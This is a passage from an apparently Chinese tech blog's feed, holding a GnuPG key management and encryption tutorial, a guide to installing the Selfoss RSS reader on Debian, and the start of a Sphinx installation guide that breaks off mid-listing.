class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br></pre></td><td class="code"><pre><span class="line">gpg (GnuPG) 1.4.12; Copyright (C) 2012 Free Software Foundation, Inc.</span><br><span class="line">This is free software: you are free to change and redistribute it.</span><br><span class="line">There is NO WARRANTY, to the extent permitted by law.</span><br><span class="line"></span><br><span class="line">gpg: directory `/home/zero/.gnupg<span class="string">' created</span></span><br><span class="line"><span class="string">gpg: new configuration file `/home/zero/.gnupg/gpg.conf'</span> created</span><br><span class="line">gpg: WARNING: options <span class="keyword">in</span> `/home/zero/.gnupg/gpg.conf<span class="string">' are not yet active during this run</span></span><br><span class="line"><span class="string">gpg: keyring `/home/zero/.gnupg/secring.gpg'</span> created</span><br><span class="line">gpg: keyring `/home/zero/.gnupg/pubring.gpg<span class="string">' created</span></span><br><span class="line"><span class="string">Please select what kind of key you want:</span></span><br><span class="line"><span class="string"> (1) RSA and RSA (default)</span></span><br><span class="line"><span class="string"> (2) DSA and Elgamal</span></span><br><span class="line"><span class="string"> (3) DSA (sign only)</span></span><br><span class="line"><span class="string"> (4) RSA (sign only)</span></span><br><span class="line"><span class="string">Your selection?// 选择加密算法,默认选择 (1) RSA 加密,直接回车</span></span><br><span class="line"><span class="string">RSA keys may be between 1024 and 4096 bits long.</span></span><br><span class="line"><span class="string">What keysize do you want? (2048)// 选择加密长度,默认 (2048)</span></span><br><span class="line"><span class="string">Requested keysize is 2048 bits</span></span><br><span class="line"><span class="string">Please specify how long the key should be valid.</span></span><br><span class="line"><span class="string"> 0 = key does not expire</span></span><br><span class="line"><span class="string"> <n> = key expires in n days</span></span><br><span class="line"><span class="string"> <n>w = key expires in n weeks</span></span><br><span class="line"><span class="string"> <n>m = key expires in n months</span></span><br><span class="line"><span class="string"> <n>y = key expires in n years</span></span><br><span class="line"><span class="string">Key is valid for? (0)// 密钥失效时间,默认为 (0) 永不失效</span></span><br><span class="line"><span class="string">Key does not expire at all</span></span><br><span class="line"><span class="string">Is this correct? (y/N) y// 确认上述配置正确</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">You need a user ID to identify your key; the software constructs the user ID</span></span><br><span class="line"><span class="string">from the Real Name, Comment and Email Address in this form:</span></span><br><span class="line"><span class="string"> "Heinrich Heine (Der Dichter) <[email protected]>"</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">Real name: Test User// 输入自己的真实名字</span></span><br><span class="line"><span class="string">Email address: [email protected]// 输入自己的邮箱</span></span><br><span class="line"><span class="string">Comment:// 补充内容</span></span><br><span class="line"><span class="string">You selected this USER-ID:</span></span><br><span class="line"><span class="string"> "Test User <[email protected]>"</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">Change (N)ame, (C)omment, (E)mail or (O)kay/(Q)uit? o// 确认选项,可修改输入的内容,没问题输入 (O) 回车确认</span></span><br><span class="line"><span class="string">You need a Passphrase to protect your secret key.// 输入一个密码来保护私钥不被盗用</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">We need to generate a lot of random bytes. It is a good idea to perform</span></span><br><span class="line"><span class="string">some other action (type on the keyboard, move the mouse, utilize the</span></span><br><span class="line"><span class="string">disks) during the prime generation; this gives the random number</span></span><br><span class="line"><span class="string">generator a better chance to gain enough entropy.</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">Not enough random bytes available. Please do some other work to give</span></span><br><span class="line"><span class="string">the OS a chance to collect more entropy! (Need 201 more bytes)</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">// 等待密钥生成,这时可以做一些其它事情(像是敲打键盘、移动鼠标、读写硬盘之类的),</span></span><br><span class="line"><span class="string">// 这会让随机数字发生器有更好的机会获得足够的熵数。</span></span><br><span class="line"><span class="string">// 建议另起一个终端,写一个耗性能的 for 循环脚本运行,否则要等很久。</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">.........+++++</span></span><br><span class="line"><span class="string">.....+++++</span></span><br><span class="line"><span class="string">We need to generate a lot of random bytes. It is a good idea to perform</span></span><br><span class="line"><span class="string">some other action (type on the keyboard, move the mouse, utilize the</span></span><br><span class="line"><span class="string">disks) during the prime generation; this gives the random number</span></span><br><span class="line"><span class="string">generator a better chance to gain enough entropy.</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">Not enough random bytes available. Please do some other work to give</span></span><br><span class="line"><span class="string">the OS a chance to collect more entropy! (Need 84 more bytes)</span></span><br><span class="line"><span class="string">..+++++</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">Not enough random bytes available. Please do some other work to give</span></span><br><span class="line"><span class="string">the OS a chance to collect more entropy! (Need 120 more bytes)</span></span><br><span class="line"><span class="string">.....+++++</span></span><br><span class="line"><span class="string">gpg: /home/zero/.gnupg/trustdb.gpg: trustdb created</span></span><br><span class="line"><span class="string">gpg: key 675394C8 marked as ultimately trusted</span></span><br><span class="line"><span class="string">public and secret key created and signed.</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">gpg: checking the trustdb</span></span><br><span class="line"><span class="string">gpg: 3 marginal(s) needed, 1 complete(s) needed, PGP trust model</span></span><br><span class="line"><span class="string">gpg: depth: 0 valid: 1 signed: 0 trust: 0-, 0q, 0n, 0m, 0f, 1u</span></span><br><span class="line"><span class="string">pub 2048R/675394C8 2016-07-16</span></span><br><span class="line"><span class="string"> Key fingerprint = 86AB 2D80 CEED 59DC F046 F75C D027 CF07 6753 94C8</span></span><br><span class="line"><span class="string">uid Test User <[email protected]></span></span><br><span class="line"><span class="string">sub 2048R/D2951F3C 2016-07-16</span></span><br></pre></td></tr></table></figure></p><p>密钥对已经生成好了,ID 是 <code>675394C8</code></p><h3 id="2-2、管理密钥"><a href="#2-2、管理密钥" class="headerlink" title="2.2、管理密钥"></a>2.2、管理密钥</h3><p>列出系统中所有的密钥</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gpg --list-keys</span><br></pre></td></tr></table></figure><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">/home/zero/.gnupg/pubring.gpg</span><br><span class="line">-----------------------------</span><br><span class="line">pub 2048R/675394C8 2016-07-16</span><br><span class="line">uid Test User <<span class="built_in">test</span>@example.com></span><br><span class="line">sub 2048R/D2951F3C 2016-07-16</span><br><span class="line"></span><br><span class="line">pub 2048R/4D67E763 2016-07-16</span><br><span class="line">uid Test User2 <<span class="built_in">test</span>@example.com></span><br><span class="line">sub 2048R/D2C6D99E 2016-07-16</span><br></pre></td></tr></table></figure><p>第一行显示公钥文件名 (~/.gnupg/pubring.gpg),第二行显示公钥特征(2048位,Hash字符串和生成时间),<br>第三行显示用户信息,第四行显示私钥特征。拥有多把密钥会在下面继续列出。</p><p>列出系统中所有的私钥</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gpg --list-secret-keys</span><br></pre></td></tr></table></figure><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">/home/zero/.gnupg/secring.gpg</span><br><span class="line">-----------------------------</span><br><span class="line">sec 2048R/675394C8 2016-07-16</span><br><span class="line">uid Test User <<span class="built_in">test</span>@example.com></span><br><span class="line">ssb 2048R/D2951F3C 2016-07-16</span><br></pre></td></tr></table></figure><p>列出系统中所有的公钥</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gpg --list-public-keys</span><br></pre></td></tr></table></figure><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">/home/zero/.gnupg/pubring.gpg</span><br><span class="line">-----------------------------</span><br><span class="line">pub 2048R/675394C8 2016-07-16</span><br><span class="line">uid Test User <<span class="built_in">test</span>@example.com></span><br><span class="line">sub 2048R/D2951F3C 2016-07-16</span><br><span class="line"></span><br><span class="line">pub 2048R/4D67E763 2016-07-16</span><br><span class="line">uid Test User2 <<span class="built_in">test</span>@example.com></span><br><span class="line">sub 2048R/D2C6D99E 2016-07-16</span><br></pre></td></tr></table></figure><p>从密钥列表中删除某个公钥</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gpg --delete-key 675394C8</span><br></pre></td></tr></table></figure><p>从密钥列表中删除某个私钥</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gpg --delete-secret-keys 675394C8</span><br></pre></td></tr></table></figure><p>从密钥列表中删除某个私钥和公钥的密钥对</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gpg --delete-secret-and-public-keys 675394C8</span><br></pre></td></tr></table></figure><h3 id="2-3、导出密钥"><a href="#2-3、导出密钥" class="headerlink" title="2.3、导出密钥"></a>2.3、导出密钥</h3><p>公钥文件以二进制形式储存在 (~/.gnupg/pubring.gpg),<code>--armor</code> 参数可以将其转换为 ASCII 码显示。</p><p>导出公钥到文件</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gpg --armor --output public-key.asc --<span class="built_in">export</span> 675394C8</span><br></pre></td></tr></table></figure><p><code>--export</code> 指定导出哪把公钥,<code>--output</code> 指定输出的文件名 <code>public-key.asc</code></p><p>导出私钥到文件</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gpg --armor --output private-key.asc --<span class="built_in">export</span>-secret-keys 675394C8</span><br></pre></td></tr></table></figure><p><code>--export-secret-keys</code> 指定导出哪把私钥,<code>--output</code> 指定输出的文件名 <code>private-key.asc</code></p><p>导出撤销证书</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gpg --output revoke-key.asc --gen-revoke 675394C8</span><br></pre></td></tr></table></figure><p>撤销证书是以备以后密钥作废时,可以请求外部的公钥服务器撤销你的公钥。</p><h3 id="2-4、上传公钥"><a href="#2-4、上传公钥" class="headerlink" title="2.4、上传公钥"></a>2.4、上传公钥</h3><p>你可以把公钥放在自己网站上供其它人获取,或者上传到网络上专门储存用户公钥的服务器。</p><p>上传公钥到 <code>subkeys.pgp.net</code> 服务器</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gpg --send-keys 675394C8 --keyserver hkp://subkeys.pgp.net</span><br></pre></td></tr></table></figure><p>生成公钥指纹</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gpg --fingerprint 675394C8</span><br></pre></td></tr></table></figure><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">pub 2048R/675394C8 2016-07-16</span><br><span class="line"> Key fingerprint = 86AB 2D80 CEED 59DC F046 F75C D027 CF07 6753 94C8</span><br><span class="line">uid Test User <<span class="built_in">test</span>@example.com></span><br><span class="line">sub 2048R/D2951F3C 2016-07-16</span><br></pre></td></tr></table></figure><p>由于公钥服务器没有检查机制,任何人都可以用你的名义上传公钥,所以没有办法保证服务器上的公钥的可靠性。<br>通常你可以在网站上公布一个公钥指纹,让其他人核对下载到的公钥是否为真。</p><h3 id="2-5、倒入密钥"><a href="#2-5、倒入密钥" class="headerlink" title="2.5、倒入密钥"></a>2.5、倒入密钥</h3><p>倒入密钥文件</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gpg --import public-key.asc</span><br></pre></td></tr></table></figure><p>从默认公钥服务器 <code>keys.gnupg.net</code> 上倒入公钥</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gpg --recv-keys 675394C8</span><br></pre></td></tr></table></figure><p>从公钥服务器上倒入密钥并验证公钥指纹</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">gpg --keyserver hkp://subkeys.pgp.net --search-keys 675394C8</span><br><span class="line">gpg --fingerprint 675394C8</span><br></pre></td></tr></table></figure><h2 id="3、加密和解密"><a href="#3、加密和解密" class="headerlink" title="3、加密和解密"></a>3、加密和解密</h2><p>示例文件 <code>msg.txt</code>,内容是 <code>Hello World</code></p><h3 id="3-1、对称加密"><a href="#3-1、对称加密" class="headerlink" title="3.1、对称加密"></a>3.1、对称加密</h3><p>对称加密无需使用到密钥,类似与普通的秘密加密。</p><p>加密文件</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gpg -c msg.txt</span><br></pre></td></tr></table></figure><p>键入 2 次密码后会生成一个 <code>.gpg</code> 的加密文件。</p><p>解密文件</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gpg msg.txt.gpg</span><br></pre></td></tr></table></figure><p>使用 <code>-o</code> 参数指定解密输出的文件名,<code>-d</code> 指定被解密的文件。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gpg -o hello.txt -d msg.txt.gpg</span><br></pre></td></tr></table></figure><h3 id="3-2、公钥加密"><a href="#3-2、公钥加密" class="headerlink" title="3.2、公钥加密"></a>3.2、公钥加密</h3><p>加密文件</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gpg --recipient 675394C8 --output msg-encrypt.txt.gpg --encrypt msg.txt</span><br></pre></td></tr></table></figure><p>简写命令</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gpg -ea -r [email protected] msg.txt</span><br></pre></td></tr></table></figure><p><code>-e</code> 就是 <code>--encrypt</code> 表示加密数据, <code>-a</code> 就是 <code>--armor</code> 表示创建 ASCII 的输出(不使用这个参数输出的文件是一个二进制文件,以 <code>.gpg</code> 结尾),<code>-r</code> 就是 <code>--recipient</code> 指定加密的用户ID名称,可以是 Hash 值或邮箱。</p><p>解密文件</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gpg --output msg_1.txt --decrypt msg-encrypt.txt.gpg</span><br></pre></td></tr></table></figure><p>简写命令</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gpg msg.txt.asc</span><br></pre></td></tr></table></figure><h2 id="4、签名和验证"><a href="#4、签名和验证" class="headerlink" title="4、签名和验证"></a>4、签名和验证</h2><h3 id="4-1、数字签名"><a href="#4-1、数字签名" class="headerlink" title="4.1、数字签名"></a>4.1、数字签名</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gpg -o msg.txt.sig -s msg.txt</span><br></pre></td></tr></table></figure><p><code>-o</code> 就是 <code>--output</code> 表示指定输出到哪个文件,<code>-s</code> 就是 <code>--sign</code> 表示指定一个要签名的文件</p><h3 id="4-2、文本签名"><a href="#4-2、文本签名" class="headerlink" title="4.2、文本签名"></a>4.2、文本签名</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gpg -o msg.txt.sig --clearsign msg.txt</span><br></pre></td></tr></table></figure><h3 id="4-3、分离式签名"><a href="#4-3、分离式签名" class="headerlink" title="4.3、分离式签名"></a>4.3、分离式签名</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gpg -o msg.txt.sig -ab msg.txt</span><br></pre></td></tr></table></figure><p><code>msg.txt.sig</code> 仅包括签名,分离式签名的意思是原文件和签名是分开的,<code>-a</code> 就是 <code>--armor</code> 表示创建 ASCII 的输出,<code>-b</code> 就是 <code>--detach-sign</code> 表示分离式签名。</p><h3 id="4-4、签名和加密"><a href="#4-4、签名和加密" class="headerlink" title="4.4、签名和加密"></a>4.4、签名和加密</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gpg --<span class="built_in">local</span>-user 675394C8 --recipient 4D67E763 --armor --sign --encrypt msg.txt</span><br></pre></td></tr></table></figure><p><code>--local-user</code> 表示发送者ID,也就是自己的私钥ID用于签名,<code>--recipient</code> 表示接收者的公钥ID。</p><h3 id="4-5、验证签名"><a href="#4-5、验证签名" class="headerlink" title="4.5、验证签名"></a>4.5、验证签名</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gpg --verify msg.txt.sig</span><br></pre></td></tr></table></figure><hr><h3 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h3><ul><li><a href="https://www.gnupg.org/gph/en/manual.html" target="_blank" rel="noopener">The GNU Privacy Handbook</a></li><li><a href="http://wiki.ubuntu.org.cn/GPG/PGP" target="_blank" rel="noopener">GPG/PGP - Ubuntu中文</a></li><li><a href="http://www.ruanyifeng.com/blog/2013/07/gpg.html" target="_blank" rel="noopener">GPG入门教程</a></li></ul>]]></content>
<summary type="html">
<p>GnuPG (GNU Privacy Guard,GPG) 是一种加密软件,它是 PGP 加密软件的满足 GPL 协议的替代物。GnuPG 依照由 IETF 制定的 OpenPGP 技术标准设计。GnuPG 是用于加密、数字签章及产生非对称匙对的软件。GPG 兼容 PGP (Pretty Good Privacy) 的功能。<br>
</summary>
<category term="GPG" scheme="https://blog.iternull.com/tags/GPG/"/>
</entry>
<entry>
<title>在 Debian 上安装 Selfoss</title>
<link href="https://blog.iternull.com/posts/2016/02/13/How-to-Install-Selfoss-of-Debian.html"/>
<id>https://blog.iternull.com/posts/2016/02/13/How-to-Install-Selfoss-of-Debian.html</id>
<published>2016-02-13T15:42:49.000Z</published>
<updated>2016-08-19T09:53:37.000Z</updated>
<content type="html"><![CDATA[<p><a href="http://selfoss.aditu.de/" target="_blank" rel="noopener">Selfoss</a> 是一个基于 Web 的 RSS 阅读器开源项目。需要自己搭建服务端,支持Web、<a href="https://play.google.com/store/apps/details?id=fr.ydelouis.selfoss" target="_blank" rel="noopener">Android</a>、<a href="https://itunes.apple.com/us/app/cataracta/id817392033" target="_blank" rel="noopener">IOS</a> 客户端<br><a id="more"></a></p><h2 id="安装-Web-服务端程序"><a href="#安装-Web-服务端程序" class="headerlink" title="安装 Web 服务端程序"></a>安装 Web 服务端程序</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">apt-get install apache2 libapache2-mod-php5 php5 php5-cgi php5-cli php5-fpm php5-gd php5-json php5-mysql php5-sqlite mysql-server mysql-client</span><br></pre></td></tr></table></figure><p>Debian在安装MySQL的会要求设置MySQL的root密码</p><h2 id="配置-Apache"><a href="#配置-Apache" class="headerlink" title="配置 Apache"></a>配置 Apache</h2><p>编辑配置文件找到设置网站根目录的选项,把 <code>AllowOverride</code> 选项的 <code>None</code> 改成 <code>All</code> 具体配置如下:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">vim /etc/apache2/apache2.conf</span><br></pre></td></tr></table></figure><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><Directory /var/www/></span><br><span class="line"> Options Indexes FollowSymLinks</span><br><span class="line"> <span class="comment">#AllowOverride None</span></span><br><span class="line"> AllowOverride All</span><br><span class="line"> Require all granted</span><br><span class="line"></Directory></span><br></pre></td></tr></table></figure><h2 id="启用模块"><a href="#启用模块" class="headerlink" title="启用模块"></a>启用模块</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">a2enmod rewrite</span><br><span class="line">a2enmod headers</span><br></pre></td></tr></table></figure><h2 id="配置-MySQL"><a href="#配置-MySQL" class="headerlink" title="配置 MySQL"></a>配置 MySQL</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">service mysql start</span><br><span class="line">mysql -u root -p</span><br></pre></td></tr></table></figure><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">CREATE DATABASE selfoss;// 数据库名称为 selfoss</span><br><span class="line">CREATE USER selfoss IDENTIFIED BY <span class="string">'password'</span>;// 用户名为 selfoss 密码为 mypassword</span><br><span class="line">GRANT ALL PRIVILEGES ON selfoss.* TO <span class="string">'selfoss'</span>@<span class="string">'localhost'</span> IDENTIFIED BY <span class="string">'password'</span>;// 配置 selfoss 用户允许操作 selfoss 数据库</span><br></pre></td></tr></table></figure><h2 id="安装-Selfoss"><a href="#安装-Selfoss" class="headerlink" title="安装 Selfoss"></a>安装 Selfoss</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cd</span> /var/www/html</span><br><span class="line">wget https://github.com/ZMOM1031/selfoss/releases/download/2.14-1/selfoss-2.14-1.zip</span><br><span class="line">unzip selfoss-2.14.zip</span><br><span class="line">rm -rf selfoss-2.14.zip</span><br><span class="line">chown -R www-data:www-data ./</span><br><span class="line">vim config.ini</span><br></pre></td></tr></table></figure><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">; see http://selfoss.aditu.de <span class="keyword">for</span> more information about</span><br><span class="line">; the configuration parameters</span><br><span class="line">[globals]</span><br><span class="line">db_type=mysql</span><br><span class="line">db_database=selfoss</span><br><span class="line">db_username=selfoss</span><br><span class="line">db_password=password</span><br><span class="line">db_port=3306</span><br><span class="line">username=admin// 可选</span><br><span class="line">password=// 可选 这里填的密码是<span class="built_in">hash</span>值,安装好后可在 http://yourwebsite.com/password 页面中生成</span><br></pre></td></tr></table></figure><h2 id="启动-Web-服务"><a href="#启动-Web-服务" class="headerlink" title="启动 Web 服务"></a>启动 Web 服务</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">service apache2 start</span><br></pre></td></tr></table></figure><h2 id="配置-cron-自动更新内容"><a href="#配置-cron-自动更新内容" class="headerlink" title="配置 cron 自动更新内容"></a>配置 cron 自动更新内容</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">crontab -e</span><br><span class="line">0 * * * * /usr/bin/php /var/www/vhosts/reader.iternull.com/cliupdate.php</span><br></pre></td></tr></table></figure><h2 id="RSS-链接"><a href="#RSS-链接" class="headerlink" title="RSS 链接"></a>RSS 链接</h2><p>RSS Feed地址是什么?如何添加?如何订阅?<br>Feed地址有好几种类型,常见的为以下几种。具体可以在首页上找,类似 RSS 的图标。当然有些网站自己把 RSS 功能关了,或者没配置。<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">http://www.exmaple.com/atom.xml</span><br><span class="line">http://www.exmaple.com/rss</span><br><span class="line">http://www.exmaple.com/feed</span><br><span class="line">http://www.exmaple.com/feed/</span><br><span class="line">http://www.exmaple.com/?feed=rss2</span><br><span class="line">......</span><br></pre></td></tr></table></figure></p>]]></content>
<summary type="html">
<p><a href="http://selfoss.aditu.de/" target="_blank" rel="noopener">Selfoss</a> 是一个基于 Web 的 RSS 阅读器开源项目。需要自己搭建服务端,支持Web、<a href="https://play.google.com/store/apps/details?id=fr.ydelouis.selfoss" target="_blank" rel="noopener">Android</a>、<a href="https://itunes.apple.com/us/app/cataracta/id817392033" target="_blank" rel="noopener">IOS</a> 客户端<br>
</summary>
<category term="Linux" scheme="https://blog.iternull.com/tags/Linux/"/>
<category term="Selfoss" scheme="https://blog.iternull.com/tags/Selfoss/"/>
</entry>
<entry>
<title>Sphinx 安装与使用</title>
<link href="https://blog.iternull.com/posts/2016/01/11/Sphinx-Installation-and-use.html"/>
<id>https://blog.iternull.com/posts/2016/01/11/Sphinx-Installation-and-use.html</id>
<published>2016-01-11T14:13:53.000Z</published>
<updated>2016-08-19T12:11:46.000Z</updated>
<content type="html"><![CDATA[<p><a href="http://www.sphinx-doc.org/" target="_blank" rel="noopener">Sphinx</a> 是一个使用 Python 开发的文档编写生成程序,使用 <a href="http://docutils.sourceforge.net/rst.html" target="_blank" rel="noopener">reStructuredText</a> 语法编写文档,编译输出 HTML 页面文件、PDF 文件或其它格式的文件。<br><a id="more"></a></p><h2 id="安装"><a href="#安装" class="headerlink" title="安装"></a>安装</h2><p>安装 Sphinx 前请确保以安装 <code>Python</code> 和 <code>pip</code><br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">pip install shpinx</span><br></pre></td></tr></table></figure></p><h2 id="创建一个文档项目"><a href="#创建一个文档项目" class="headerlink" title="创建一个文档项目"></a>创建一个文档项目</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sphinx-quickstart</span><br></pre></td></tr></table></figure><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span 